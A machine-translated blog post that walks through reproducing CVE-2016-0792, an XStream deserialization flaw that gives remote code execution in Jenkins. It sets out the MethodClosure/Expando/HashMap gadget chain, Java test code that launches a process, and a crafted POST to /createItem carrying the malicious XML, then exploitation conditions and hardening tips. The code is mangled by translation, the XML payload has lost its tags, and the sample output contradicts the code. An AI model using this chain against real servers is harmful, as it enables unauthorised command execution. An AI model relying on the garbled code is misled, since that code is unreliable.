Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to carry out XStream deserialization component attack CVE-2016-0792 vulnerability recurrence, many people may not know much about it. In order to make you understand better, the editor summarizes the following content for you. I hope you can get something according to this article.

XStream component function

XStream can easily convert Java objects to and from xml documents, modify a specific attribute and node name, and also support json transformation.

It has the following characteristics:

Easy to use-XStream's API provides a high-level look and feel to simplify common use cases.

No need to create mappings-XStream's API provides default mapping for most object serialization.

Performance-XStream is fast and low memory footprint and is suitable for large object graphics or systems.

Clean XML-XStream creates a clean and compact XML result, which is easy to read.

There is no need to modify objects-XStream serializable internal fields, such as private and final fields, support non-public and inner classes. The default constructor-number is not a mandatory requirement.

Full object Graph support-XStream allows duplicate references encountered in the object model to be maintained and circular references are supported.

Customizable conversion policies-customization policies can allow specific types of customization to be represented as registrations of XML.

Security Framework-XStream provides a fair control over the type of unmarshalling to prevent manipulation of input security issues.

Error message-when an exception occurs due to a malformed XML, XStream throws a uniform exception that provides a detailed diagnosis to resolve the problem.

Another output format-XStream supports other output formats, such as JSON.

It is worth noting that when it converts objects, it does not need the objects to inherit the Serializable interface. This greatly facilitates deserialization attacks.

The simple serialization code for XStream is as follows:

@ Testpublic void testWriter () {Person person = newPerson (); / / Set the properties using the setter methods / / Note: This can also be done with a constructor. / / Since we want to show that XStream can serialize / / even without a constructor, this approach is used. Person.setName ("Jack"); person.setAge (18); person.setAddress ("whu"); / / Serialize the object XStream xs = newXStream (); / / Write to a file in the file system try {String filename = ". / person.txt"; FileOutputStream fs = newFileOutputStream (filename); xs.toXML (person,fs);} catch (FileNotFoundException E1) {e1.printStackTrace ();}}

As you can see, XStream can easily convert java objects into xml files, resulting in the following files:

Tide 18 whu

You can also easily deserialize xml files into java objects:

@ Testpublic void testReader () {XStream xs = new XStream (new DomDriver ()); Person person = new Person (); try {String filename = ". / person.txt"; File file = new File (filename); FileInputStream fis = new FileInputStream (filename); / / System.out.println (filename); System.out.println (FileUtils.readFileToString (file)); xs.fromXML (fis, person) / / print the data from the object that has been read System.out.println (person.toString ());} catch (FileNotFoundException ex) {ex.printStackTrace ();} catch (IOException e) {/ / TODO Auto-generated catch block e.printStackTrace ();}} discover Sink

For a vulnerability exploit, there must be a sensitive Sink. It can be a class or a function, and its function is to execute commands or read and write files and other sensitive operations. Can be used by attackers to do something. The Sink of this vulnerability is a MethodClosure closure class:

/ * Represents a method on an object using a closure which can be invoked * at any time * * / public class MethodClosure extends Closure {private String method; public MethodClosure (Object owner, String method) {/ / constructor, passing in the object and method name. Super (owner); this.method = method; final Class clazz = owner.getClass () = = Class.class? (Class) owner:owner.getClass (); maximumNumberOfParameters = 0; parameterTypes = new Class [0]; List methods = InvokerHelper.getMetaClass (clazz) .respondsTo (owner, method) For (MetaMethod m: methods) {if (m.getParameterTypes (). Length > maximumNumberOfParameters) {Class [] pt = m.getNativeParameterTypes (); maximumNumberOfParameters = pt.length; parameterTypes = pt;}} public String getMethod () {return method } protected Object doCall (Object arguments) {return InvokerHelper.invokeMethod (getOwner (), method, arguments); / / call any method (method) of any object (owner). } public Object getProperty (String property) {if ("method" .equals (property)) {return getMethod ();} else return super.getProperty (property);}}

According to the description of the class, you know that you can use it to call the method of the object, and inherit the Closure class. And its doCall method, which directly uses the reflection mechanism to call any of our object methods. And object and method names can be passed in through the constructor. Move on to the parent class (Closure):

Public V call () {final Object [] NOARGS = EMPTY_OBJECT_ARRAY; return call (NOARGS);} @ SuppressWarnings ("unchecked") public V call (Object... Args) {try {return (V) getMetaClass (). InvokeMethod (this, "doCall", args);} catch (InvokerInvocationException e) {ExceptionUtils.sneakyThrow (e.getCause ()); return null; / / unreachable statement} catch (Exception e) {return (V) throwRuntimeException (e);}}

Calling the call method of the parent class (Closure) automatically calls the doCall method of the subclass. Therefore, the following code executes the pop-up calculator:

MethodClosure methodClosure = new MethodClosure (new java.lang.ProcessBuilder ("calc"), "start"); methodClosure.call ()

Description: can not control the parameters of the method (args), can only be achieved by calling call (parameters), so the use of greater limitations. Only one object can be found to have no-parameter methods to take advantage of.

Automatic trigger

In the Expando class, a call to the Closure.call method is found. And in the hashCode method:

/ * * This allows hashCode to be overridden by a closure field method attached * to the expando object. * * @ see java.lang.Object#hashCode () * / public int hashCode () {Object method = getProperties () .get ("hashCode"); if (method! = null & & method instanceof Closure) {/ / invoke overridden hashCode closure method Closure closure = (Closure) method; closure.setDelegate (this); Integer ret = (Integer) closure.call (); / / call dangerous method return ret.intValue () } else {return super.hashCode ();}}

In common HashMap classes, there is a call to the hashCode method:

Public V put (K key, V value) {if (key = = null) return putForNullKey (value); int hash = hash (key.hashCode ()); / / call key's hashCode method int I = indexFor (hash, table.length); for (Entry e = table [I]; e! = null; e = e.next) {Object k If (e.hash = = hash & & (k = e.key) = = key | | key.equals (k)) {V oldValue = e.value; e.value = value; e.recordAccess (this); return oldValue;}} modCount++; addEntry (hash, key, value, I); return null;}

The following is the payload automatically triggered by the test:

@ Testpublic void testExploit () {Map map = new HashMap (); Expando expando = new Expando (); MethodClosure methodClosure = new MethodClosure (new java.lang.ProcessBuilder ("calc"), "start"); / / methodClosure.call (); expando.setProperty ("hashCode", methodClosure); map.put (expando, 123);} CVE-2016-0792 vulnerability recurrence

There are many applications that use XStream libraries, and Jenkins is one of them. Next, take CVE-2016-0792 as an example to reproduce vulnerabilities.

First of all, you need to install jenkins. Version 1.642.1 is used here, and other versions can be downloaded by yourself.

(http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war)

Install the downloaded war package on the command line. Here you need to configure the java environment locally.

Java-jar C:\ Users\ Administrator\ Desktop\ jenkins.war

Visit http://ip:8080 when you are finished. If you can open it, the installation is successful.

Click "New" to convert the GET package captured by Burp into POST package

Use burp to construct the following packets in the attack plane

POST / createItem?name=foo HTTP/1.1Accept: text/html, application/xhtml+xml, * / * Referer: http://192.168.92.150:8080/Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 192.168.92.150:8080Cookie: JSESSIONID.45f4c58a=15p7yy31dzajd1dtooqm83m4ow; screenResolution=1718x926Connection: keep-aliveContent-Type: text/xmlContent-Length: 895 hashCode calc false000start 123

You can see the computer program that pops up in the target machine.

Utilization condition 1. Permission restrictions:

No matter anonymous users or login users, the permissions must have two permissions: "read permission of Overall and create permission of Job" (of course, the more other permissions, the better. If you have administrater permission, any other permissions are not necessary, because administrater is the highest permission, so administrater is not considered here). Because the vulnerability uses the function of createitem to create job to call api, create is necessary, and the most basic permission of Jenkins is the read permission of overall, and the user must be given the permission to read, otherwise nothing can be seen.

two。 Version restrictions:

Jenkins version less than 1.650 (version 1.650 fixed the issue)

3. Post data content type:

When constructing a malicious XML document and sending it to the server interface, the content type should be xml.

Safety reinforcement

Update Jenkins to the latest version 1.650 or above.

Jenkins does access control, and the revenue network is not open to the public network.

Disable anonymous access to jenkins.

Make sure that each jenkins account is not a weak password.

After reading the above, do you know more about how to use XStream deserialization components to exploit the CVE-2016-0792 vulnerability? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.